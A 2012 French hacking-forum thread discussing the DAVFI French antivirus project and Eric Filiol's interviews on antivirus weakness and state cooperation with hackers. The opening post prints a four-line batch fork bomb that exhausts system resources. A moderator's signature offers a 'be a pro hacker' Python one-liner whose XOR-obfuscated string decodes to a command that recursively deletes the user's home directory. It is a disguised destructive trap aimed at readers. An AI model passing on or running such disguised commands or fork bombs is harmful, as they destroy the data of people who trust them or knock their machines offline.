Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-08-2012 19:47:46

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

DAVFI ou le nouveau antivirus français

Hello wink

"Nous allons compliquer la vie des concepteurs de codes malveillants" tels sont les propos de Mr Eric Filiol un expert de la sécurité informatique en France qui dirige le laboratoire Cryptologie et Virologie Opérationnelles au sein de l’école supérieure d'informatique, d'électronique et d'automatisme (ESIEA) de Laval.

Soutenu par le Fonds national pour la Société Numérique (FSN) dans le cadre des Investissements d'Avenir (Grand Emprunt), le projet DAVFI (Démonstrateur antivirus français et international) est conçu pour évoluer en fonction des besoins et demandes des utilisateurs. Suite à l'annonce de l'entrée du projet dans sa phase opérationnelle, entretien avec deux de ses concepteurs.

* Jérôme Notin, bonjour. Quelle est la genèse de ce projet ? Pourquoi développer un antivirus français ?

Cela fait de longues années que nous travaillons dans le monde de la sécurité. Nos échanges avec les utilisateurs et certains organismes nous ont fait prendre conscience qu'il était délicat de confier la sécurité de nos systèmes à des logiciels qui, d'une part sont complètement fermés et dont on ne peut pas connaitre le comportement réel, et d'autre part qui sont édités par des entreprises qui ne mettent pas toujours en premier lieu l'augmentation du niveau de sécurité de leurs utilisateurs.

* Après la validation de ce projet, quelles sont les prochaines étapes ?

Nous allons travailler d'arrache-pied pendant les deux années qui viennent pour répondre aux attentes que l'on place en nous. La feuille n'est pas blanche car nous bénéficions des années de travaux de l'ESIEA et en particulier d'Éric Filiol sur la question. Mais le challenge est à la hauteur de notre motivation.

* Éric Filiol, bonjour, quelles sont les différentes techniques de détection de cet antivirus ?

Il est trop tôt pour livrer les secrets internes de DAVFI (sans donner un avantage concurrentiel aux éditeurs classiques). La première rupture réside déjà sur le modèle de sécurité choisi, lequel est dicté par un réel souci de sécurité et celui de l'intérêt des utilisateurs.

Les concepts techniques classiques ne vont plus s'appliquer. L'antivirus va s'attacher à traiter non pas des instances de code (obligeant à courir derrière la dernière signature et dont on connait l'échec patent) mais sur des classes de codes malveillants ce qui autorise déjà (premiers résultats obtenus) à traiter réellement des codes inconnus utilisant des techniques malveillantes connues. La notion de comportement a été redéfinie. Nous allons considérer les choses de manière probabiliste de façon à rendre la vie des concepteurs de codes malveillants réellement plus compliquée.

* Pourquoi y aura-t-il deux versions ? Quelles sont les particularités de celle destinée aux entreprises ?

Les besoins des utilisateurs domestiques ne sont pas les mêmes que ceux des professionnels. Les niveaux de sécurité non plus. D'autre part, les entreprises françaises doivent pouvoir bénéficier de services supplémentaires qu'actuellement les éditeurs ne leur donnent pas : confiance dans la confidentialité des données traitées, avantage stratégique à disposer de services spécifiques en particulier pour les OIV (Opérateurs d'Importance Vitale, appartenant aux secteurs de l'énergie, des transports, des finances ou à l'État, Ndlr). La différence résidera essentiellement dans des services ajoutés.

* Y aura-t-il des versions dédiées aux smartphones ?

Oui, nous allons développer une version pour les téléphones mobiles sous Android. Le système Apple étant techniquement et économiquement fermé, il n'est pas possible de travailler sérieusement pour cet environnement sans payer une fortune à Apple qui dicte sa loi. On ne peut faire un antivirus ouvert pour un système fermé.
source 5 Juillet 2012 -> clubic.com

Ce qui est étonnant surtout c'est ça:

Eric Filiol a écrit :

Une des attaques reposait sur un code malveillant de trois lignes, vieux de dix ans et montré sur YouTube. Or, il a mis K.O tous les antivirus !

Le code en question est le suivant:

:s
START %0
%0|%0
goto :s

En effet, ce code permet de faire ce qu'on appelle une Fork Bomb créant ainsi un grand nombre de processus afin de saturer la mémoire d'un ordinateur, il est aussi possible de le faire via HTML.

Mais j'aimerais revenir sur cette interview intéressante avec Eric Filiol dans laquelle il déclare que l'Etat doit travailler avec les Hackers pour contrer les menaces, pour lui c'est un potentiel considérable. Je vous laisse lire: 

* Comment expliquez-vous ce peu de sensibilité à la sécurité informatique ?

Eric Filiol : les responsables ont une défiance totale vis-à-vis de l'informatique, ils sont complètement déconnectés des réalités de la sécurité informatique, et ils y sont d'autant moins sensibilisés que ça va trop vite, en tout cas tant qu'il n'y a pas de problème.

En France, la sécurité informatique ressemble aux nuages nucléaires : les problèmes s'arrêtent aux frontières. Pourtant, on a dénombré pas moins de 600 attaques critiques envers l'administration française en 2008 !

Il y a bien des problèmes, mais on mettra toujours ça sur le dos d'un administrateur : vous ne punirez jamais un haut fonctionnaire, un décideur ou un politique. La question qui reste à se poser, c'est de savoir s'il existera un jour des correctifs pour les êtres humains, et des versions particulières pour les responsables politiques.

Quand j'étais dans l'armée, j'avais coutume de dire qu'un virus ne salue pas à l'entrée d'un régiment : devant l'informatique nous sommes tous égaux. La bêtise d'un ministre est la même que celle d'un simple exécutant, et quand un homme politique ouvre un pièce jointe ça a le même effet qu'avec n'importe quel autre être humain. Or, c'est gênant pour un homme politique de découvrir qu'il est un humain comme les autres.

* Quid de l'Agence nationale de la sécurité des systèmes d'information (ANSSI, créée en juillet 2009 pour "doter la France d’une véritable capacité de défense" informatique, rattachée au Secrétaire général de la défense et de la sécurité nationale et qui a notamment pour mission de "détecter et réagir au plus tôt en cas d’attaque informatique, prévenir la menace et jouer un rôle de conseil et de soutien aux administrations et aux opérateurs d’importance vitale" -NDLR) ?

Eric Filiol : j'aurais tendance à prendre la phrase de de Gaulle : c'est quoi ce machin ? Cela a permis de caser plus de hauts fonctionnaires et de gens sortis des grandes écoles, mais c'est une calamité en terme de ressources humaines.

Comment créer une veritable ressource humaine dans le domaine de la sécurite et une mémoire dans ce domaine, avec des personnels recrutés sur des contrats de 3 ans, renouvelable une seule fois ?

De plus, l'ANSSI n'aide que les administrations, voire les entreprises du CAC40. Les autres acteurs économiques du privé doivent se débrouiller tout seul. Quant à la DCRI, bien que très investie dans cette tâche, ils ne sont pas assez nombreux : 10, 20, c'est rien, et ils doivent se focaliser sur les entreprises qui relèvent du domaine stratégique...

* Quid des répercussions politiques ?

Eric Filiol : Des réponses -à de vrai problèmes comme le piratage ou la lutte contre le crime organisé- comme l'Hadopi ou la Loppsi sont prises dans une totale méconnaissance des dossiers : on croit imaginer qu'il suffit de mettre en place un logiciel pour surveiller les téléchargements…

Et ce qui est grave c'est qu'on a aussi fait un amalgame entre l'Hadopi et la pédophilie, et la façon qu'ils ont eu de le faire était la pire réponse, parce que le risque qu'on court, c'est que tout le monde commence à chiffrer ses communications, ce qui serait une calamité pour les policiers et gendarmes et les personnes chargées de la sécurité nationale.

On a un président de la république qui s'est fait pirater son compte bancaire, on est dans le "bling bling" de l'informatique : on a dans l'informatique ce qu'on a dans la politique. Il faut des menus déroulants partout, des interfaces flashys, mais dès qu'on parle de sécurité on est pris pour des emmerdeurs de première.

                           "Le problème, c'est que la France a longtemps diabolisé les hackers"

* Début mai, à l'occasion d'Iawacs (International Alternative Workshop on Aggressive Computing and Security), une conférence internationale de sécurité informatique (voir En France, En France, les hackers n’ont plus peur de faire leur coming out), Eric Filiol organisait un concours, PWNKILL, destiné à tester la fiabilité des logiciels d'antivirus. Résultat : une seule des sept attaques lancées par les étudiants a été correctement reconnue, et bloquée par les quinze antivirus testés, ce qui fait bondir Eric Filiol, dans 01net:

"Tous les antivirus sont à égalité dans la nullité. Ces résultats prouvent que la détection de signatures virales n'est plus suffisante. Le plus inquiétant est que sur une échelle de 1 à 10, le niveau technique moyen des attaques est de 4 environ. Face à des attaques plus sophistiquées, le résultat aurait été encore plus désastreux.

Autre constat alarmant : une des attaques reposait sur un code malveillant de trois lignes, vieux de dix ans et montré sur YouTube. Or, il a mis K.O tous les antivirus !"


Interrogé par ZDNet, Eric Filiol ne se contente pas de fustiger ceux qui vendent ce genre de logiciels censés nous protéger, mais aussi ceux qui les achètent :

"Le pire cauchemar, c'est le décideur qui écoute les messages marketing et pense qu'il suffit de réduire le personnel et d'installer un antivirus pour faire de la sécurité. Il faut que les entreprises sachent que la sécurité a un prix. On ne peut pas être un acteur passif.

Les choix des décideurs, les politiques de sécurité définies par les RSSI, les utilisateurs, tout le monde est concerné, et il n'est plus possible de déléguer la sécurité à un produit qui, on le voit bien, est extrêmement faible et peut être contourné assez simplement."

Pour lui, "le problème c'est que la France a pendant longtemps diabolisé les hackers" :

"La conséquence c'est que nous souffrons d'un manque de recherches ouvertes, alors qu'il y a un excellent potentiel en France. Il faut laisser ce potentiel s'exprimer.

L'Etat ne peut plus payer de recherches parce que les budgets sont restreints. Il doit donc s'appuyer sur une communauté de hackers vivante et qui assez souvent est là pour aider. L'Etat doit comprendre que cette ressource existe et l'utiliser.

Pour le moment, la réponse c'est l'article 323 du code pénal qui n'est plus du tout adaptée et qui finalement met dans le même sac les pirates et les hackers. Et cela, c'est la pire erreur à faire."

* En 2004 déjà, lors d'une précedente interview qu'il m'avait accordé, Eric Filiol qualifiait de "catastrophe (et de) danger pour les intérêts et la souveraineté de l'État", cet article de loi, qui punit de trois ans d'emprisonnement et de 45.000 euros d'amende «le fait, sans motif légitime, d'importer, de détenir, d'offrir, de céder ou de mettre à disposition un équipement, un instrument, un programme informatique ou toute donnée conçus ou spécialement adaptés» pour accéder ou se maintenir dans un système d'information, l'entraver ou y introduire, modifier ou supprimer des données :

"Je n'ai jamais vu autant de rejets face à un article de loi. On est dans une situation ubuesque: rien n'interdit à un individu de dénoncer le fait qu'une voiture soit vendue sans frein, dans le monde logiciel, l'individu serait condamné..."
source -> bugbrother.blog.lemonde.fr

Qu'en pensez vous de tout ça ? smile

Dernière modification par Fuji (29-08-2012 01:30:08)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-08-2012 11:18:40

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : DAVFI ou le nouveau antivirus français

Eric Filiol est un mec aware. Je l'ai croisé pendant un oral et franchement il catapulte du paté par palettes de 400Kg.
Il a raison, et c'est bien que ce message soit passé sur Le Monde.
C'est tout de même du réchauffé ce genre de discours (:


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 01-09-2012 16:04:30

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : DAVFI ou le nouveau antivirus français

Vaste débat en perspective...

Bon, pour la première partie concernant "l'antivirus français", je suis pas convaincu... Ce que je vois ici c'est le discours marketing habituel avec une couche de "Cocorico" en plus, mais j'attends de voir les résultats. Et perso je crains que ça finisse comme Exalead, le moteur de recherche français roll J'aime bien l'approche statistique qui sera plus difficile à contourner, mais
1) Je suis sûr que les ténors du milieu l'appliquent déjà (ne fut-ce que par les méthodes heuristiques)
2) Même s'ils innovent, il ne faudra pas 3 mois aux susdits ténors pour proposer la même chose.
Le fait que ça soit français est tentant pour les secteur stratégiques, mais j'ai cessé de croire à l'efficacité des antivirus contre les spywares vraiment méchants...

La seconde partie est plus intéressante. La collaboration avec les hackers, c'est un thème à la mode même si la moitié des gens qui en parlent ne savent pas ce qu'est un hacker. Enfin, au delà de la définition bateau de "pirate informatique". J'y reviendrai plus loin. Collaborons donc avec ces pirates, soit. Le grincheux pessimiste en moi ne peut s'empêcher de répondre "oui, mais comment ?".
- on dépénalise les tests d'intrusion et  de rétro-ingénierie ? Ça serait une bonne chose mais les abus seront nombreux. "Mais non monsieur le juge, je n'attaquais pas cette entreprise, je testais leur système pour les avertir ensuite des failles présentes"...
- demander aux hackers de tester nos infrastructures et de faire un rapport ? Idée tentante mais bancale. D'abord parce que c'est donner carte blanche aux script kiddies de tout poil de se lâcher contre les .gouv.fr, ensuite parce qu'un hacker sérieux qui trouve une vraie vulnérabilité aura peut-être envie de se la garder pour lui. Ou même de la revendre, on a tous besoin de se nourrir...
Sans compter que "la communauté des hackers" est un interlocuteur difficile à cibler, ils vivent souvent dans l'ombre et ils ont raison. Pas tous, OK, j'en connais qui assument très bien leur statut publiquement (et ils ne sont pas moins bons que les autres), mais c'est une minorité. Et je vois mal les autorités donner les clés des infrastructures vitales à une bande de geeks non identifiable... Et puis sur Internet, l'identité et la nationalité sont un concept très flou : un biélorusse qui attaque un ministère en passant par un relais/proxy/VPN français, ça compte ou pas ?

D'un autre côté, je trouve que la réflexion va dans la bonne direction, et Filiol a raison d'en parler. Plutôt que de se faire en permanence enfumer (pour rester poli) par des multinationales qui ne sont pas forcément compétentes ni bien intentionnées, l'état ferait mieux de faire appel aux "ressources locales" parfois mieux qualifiées. Jouer sur la fibre patriotique n'est peut-être pas le meilleur calcul, mais peut-être plutôt un challenge à la Pwn2own organisé par l'ANSSI (ou pas ^_^) avec prime/embauche à la clé.
Cette réflexion s'inscrit dans une évolution plus large de participation et d'implication citoyenne, qui va considérablement bouleverser le modèle démocratique de la société actuelle. D'ailleurs les politiques et les responsables des grands groupes industriels le sentent bien et ils n'aiment pas ça. La netocratie fait son apparition, et avec elle l'application des principes du hacking (au sens noble, celui de "bidouilleur éclairé") pour résoudre des problèmes "importants".

Bref, y a de l'idée mais faut encore trouver une bonne façon de mettre ça en place si on ne veut pas le regretter rapidement wink L'enfer est pavé de bonnes intentions...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
petit nouveau par drhouse
5 166 07-11-2016 18:31:17 par coyotus
17 11773 15-03-2016 19:46:16 par kcdtv
Jojodiesel le nouveau par JojoDiesel
3 346 14-03-2016 21:42:24 par kcdtv
Polo le nouveau par Polo81
1 384 08-03-2016 20:10:25 par kcdtv
un p'tit nouveau par k750
4 478 11-02-2016 09:06:09 par k750

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]